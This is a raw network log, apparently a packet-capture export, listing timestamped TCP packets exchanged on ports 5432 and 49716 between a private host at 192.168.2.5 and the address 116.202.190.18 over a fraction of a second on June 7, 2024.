Jun 7, 2024 17:21:17.357192039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357202053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357202053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357227087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357256889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357260942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357270956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357295036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357315063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357330084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357366085 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357384920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357384920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357402086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357440948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357489109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357518911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357531071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357542992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357568979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357570887 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357604027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357626915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357637882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357683897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357683897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357738018 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357789993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357841015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357841015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.358614922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.358644009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.358671904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.358696938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.358706951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.358731985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.358766079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.358781099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.358781099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.358819962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.359580040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.359608889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.359654903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.359654903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.359663010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.359695911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.359714031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.359730005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.359776974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.359776974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360353947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360383034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360426903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360435963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360469103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360485077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360485077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360517025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360517025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360582113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360678911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360708952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.360748053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.360749006 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362565041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362603903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362642050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362658024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362658024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362675905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362711906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362808943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362869024 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362898111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.362921000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.362991095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.363059044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.363087893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.363116026 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.363147020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.363157034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.363213062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.363260984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.363279104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.363279104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.363318920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.364145041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.364173889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.364207029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.364228010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.364228010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.364274025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.364325047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.365118980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.365159988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.365175009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.365195990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.365273952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366019011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366048098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366100073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366100073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366101027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366130114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366175890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366175890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366935015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366966009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.366995096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.366998911 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367017031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.367031097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367077112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.367077112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.367856026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367908955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367916107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.367938995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367973089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.367980957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.367980957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.368066072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369041920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369075060 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369110107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369112015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369160891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369160891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369613886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369647980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369714975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369714975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.369723082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.369831085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.370832920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.370861053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.370893955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.370897055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.370914936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.370929003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.370951891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.370964050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.371010065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.371010065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.371611118 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.371639967 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.371673107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.371680021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.371680021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.371706963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.371747017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.371747017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.372520924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.372550964 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.372590065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.372591019 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.372601032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.372636080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.372669935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.372672081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.372678995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.372765064 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.373764038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.373819113 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.373836994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.373852968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.373899937 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.373899937 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.374387980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.374417067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.374478102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.374478102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.374993086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.375026941 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.375060081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.375083923 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.375083923 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.375113964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.375639915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.375669003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.375711918 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.375793934 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.376327038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.376379967 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.376413107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.376421928 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.376446962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.376446962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.376477003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.376497030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.376497030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.376527071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.377034903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.377064943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.377101898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.377152920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.377876997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.377906084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.377938986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.377960920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378426075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378454924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378499031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378508091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378545046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378556013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378561974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378613949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378647089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378649950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378679991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378699064 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378710032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378714085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378741980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.378773928 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.378793001 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.379713058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.379745007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.379777908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.379796982 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.379810095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.379812002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.379853010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.379991055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.380466938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.380538940 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.380559921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.380589962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.380623102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.380625010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.380661011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.380661011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.381577015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.381628036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.381678104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.381679058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.382997990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383027077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383078098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383079052 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383079052 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383112907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383147001 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383155107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383168936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383286953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383671999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383699894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383739948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383785009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383814096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.383817911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383846998 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.383871078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.384735107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.384763956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.384797096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.384803057 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.384845018 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.384845018 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.384867907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.384924889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.385348082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.385400057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.385412931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.385433912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.385468006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.385479927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.385479927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.385540009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.385979891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.386008978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.386040926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.386106968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.386787891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.386821985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.386856079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.386857033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.386879921 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.386919975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.386950016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387084961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387115955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387137890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387137890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387151957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387187004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387193918 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387222052 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387222052 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387844086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387896061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387901068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387938023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.387960911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.387968063 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.388014078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.388014078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.388465881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.388531923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.388534069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.388662100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389405012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389435053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389472961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389484882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389484882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389518023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389543056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389550924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389579058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389605045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389894962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389924049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.389966011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.389966011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.391099930 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.391129017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.391170025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.391170025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392201900 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392256021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392263889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392288923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392340899 CEST	49716	5432	192.168.2.5	116.202.190.18
